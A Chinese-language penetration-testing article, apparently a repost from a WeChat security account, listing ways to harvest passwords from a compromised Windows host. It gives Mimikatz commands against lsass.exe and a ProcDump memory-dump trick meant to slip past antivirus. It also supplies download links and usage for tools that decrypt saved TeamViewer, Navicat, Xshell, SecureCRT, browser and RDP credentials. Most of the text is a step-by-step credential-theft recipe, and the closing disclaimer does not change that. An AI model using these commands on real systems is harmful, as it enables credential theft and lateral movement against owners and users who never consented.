文章来源:宸极实验室
0x00 前言
在渗透测试中,当我们拿下一台windows
主机后,通常要对主机上的一些密码做信息收集,以便后续渗透使用,本文介绍了几种windows
下常见的收集密码的方式。
0x01 windows主机密码抓取
1.1 Mimikatz
windows
密码抓取神器,从windows
系统进程lsass.exe
中抓取明文密码。
https://github.com/gentilkiwi/Mimikatz
Mimikatz.exe
,执行下面的命令:privilege::debug 提取权限
sekurlsa::logonpasswords 抓取密码
1.2 ProcDump + Mimikatz
如果主机上装了杀毒软件,开了防火墙,例如:360、火绒之类的话。Mimikatz
就会被检测为病毒,无法使用。
由于Mimikatz
是从lsass.exe
中提取明文密码的,当无法在目标机器上运行Mimikatz
时,我们可使用ProcDump
工具将系统的lsass.exe
进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz
进行读取。
ProcDump
本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
•下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/ProcDump
# 将工具拷贝到目标机器上执行如下命令(需要管理员权限)
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
Mimikatz# sekurlsa::minidump lsass.dmp
Mimikatz# sekurlsa::logonPasswords full
1.3 PwDump7
使用该工具获取hash
值之后,可到cmd5.com
进行解密。
1.4 Getpass
https://raw.githubusercontent.com/k8gege/K8tools/master/GetPassword_x64.rar
0x02 第三方运维工具密码抓取
2.1 TeamViewer
•下载地址:
https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe
•使用方法:
SharpDecryptPwd.exe -TeamViewer
2.2 Navicat
•下载地址:
https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe
SharpDecryptPwd.exe -NavicatCrypto
2.3 xshell
•下载地址:
https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe
•使用方法:
先执行 `whoami /user` 将用户名和sid保存下来,然后再使用下面的命令:
SharpDecryptPwd.exe -Xmangager -p SessionPath -s username+sid
2.4 securecrt
•下载地址:
https://github.com/hustlibraco/Moye/blob/master/SecureCRTDecrypt.py
•使用方法:
解密secureCRT保存的密码
1. 找到密码保存位置,每台服务器一个ini文件,windows系统位于
* 用户名AppDataRoamingVanDykeConfigSessions (安装版)
*SecureCRTSecureFX_hh_x86_7.0.0.326DataSettingsConfigSessions (绿色移动版)
2. 执行脚本,python SecureCRTDecrypt.py [filename...]
0x03 浏览器密码抓取
3.1 LaZagne
•下载地址:
https://github.com/ethicalhackeragnidhra/LaZagne/archive/2.3.1.zip
•使用方法:
laZagne.exe browsers
3.2 BrowserPasswordDump
• 下载地址:
https://files1.majorgeeks.com/020c4877362530fccadf006a858f56ee9637177d/covertops/BrowserPasswordDump.zip
• 使用方法:
点击setup安装完成以后,即可提取出单文件来运行使用。
0x04 远程桌面连接密码抓取
4.1 netpass
•下载地址:
https://www.nirsoft.net/toolsdownload/netpass-x64.zip
•使用说明:
使用管理员权限运行即可
0x05 总结
1、上述描述的抓取密码的方式,大部分需使用管理员权限才能抓取。
2、windows
密码仅在win2008
及以下可使用,win10
及server2012
及以上默认不保存明文密码,无法使用工具抓取。
推荐文章++++
本文始发于微信公众号(黑白之道):『红蓝对抗』Windows 下登录凭证获取技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论